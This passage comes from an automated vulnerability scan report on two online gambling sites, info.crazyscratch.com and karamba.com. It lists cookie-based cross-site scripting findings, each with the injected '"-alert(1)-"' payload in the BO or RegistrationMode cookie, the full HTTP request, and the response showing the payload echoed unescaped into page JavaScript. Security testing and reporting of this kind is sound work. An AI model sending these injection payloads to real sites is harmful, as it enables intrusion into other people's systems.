This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM5a641"-alert(1)-"d0d94d4432a; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM5a641"-alert(1)-"d0d94d4432a; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:21 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:21 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:21 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:21 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:21 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM5a641"-alert(1)-"d0d94d4432a";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.257. http://www.info.crazyscratch.com/Terms.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e7cf"-alert(1)-"adb1b7af95d was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM7e7cf"-alert(1)-"adb1b7af95d; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:52:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:37 GMT; path=/
Set-Cookie: BO=FM7e7cf"-alert(1)-"adb1b7af95d; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:37 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:37 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7e7cf"-alert(1)-"adb1b7af95d";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.258. http://www.info.crazyscratch.com/Terms.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ee3a"-alert(1)-"140d6128279 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM7ee3a"-alert(1)-"140d6128279; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM7ee3a"-alert(1)-"140d6128279; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:51 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:51 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:51 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:51 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:51 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM7ee3a"-alert(1)-"140d6128279";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.259. http://www.info.crazyscratch.com/UnderAge.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80420"-alert(1)-"559429cbbbf was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM80420"-alert(1)-"559429cbbbf; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:52:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:16 GMT; path=/
Set-Cookie: BO=FM80420"-alert(1)-"559429cbbbf; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:16 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:16 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:16 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM80420"-alert(1)-"559429cbbbf";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.260. http://www.info.crazyscratch.com/UnderAge.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75d3c"-alert(1)-"b6694994ca2 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM75d3c"-alert(1)-"b6694994ca2; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM75d3c"-alert(1)-"b6694994ca2; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:40 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:40 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:40 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:40 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM75d3c"-alert(1)-"b6694994ca2";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.261. http://www.karamba.com/ [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a65"-alert(1)-"60ba66ac5be was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM35a65"-alert(1)-"60ba66ac5be; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/
Set-Cookie: BO=FM35a65"-alert(1)-"60ba66ac5be; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM35a65"-alert(1)-"60ba66ac5be";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.262. http://www.karamba.com/ [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2d46"-alert(1)-"1e89358a960 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMa2d46"-alert(1)-"1e89358a960; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMa2d46"-alert(1)-"1e89358a960; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMa2d46"-alert(1)-"1e89358a960";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.263. http://www.karamba.com/AboutUs.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dfb5"-alert(1)-"ba293f13ed2 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM5dfb5"-alert(1)-"ba293f13ed2; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/
Set-Cookie: BO=FM5dfb5"-alert(1)-"ba293f13ed2; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM5dfb5"-alert(1)-"ba293f13ed2";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.264. http://www.karamba.com/AboutUs.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eefdb"-alert(1)-"f5f9d8a99ed was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMeefdb"-alert(1)-"f5f9d8a99ed; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMeefdb"-alert(1)-"f5f9d8a99ed; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMeefdb"-alert(1)-"f5f9d8a99ed";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.265. http://www.karamba.com/FairPlay.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95c72"-alert(1)-"49ec3582046 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM95c72"-alert(1)-"49ec3582046; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/
Set-Cookie: BO=FM95c72"-alert(1)-"49ec3582046; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

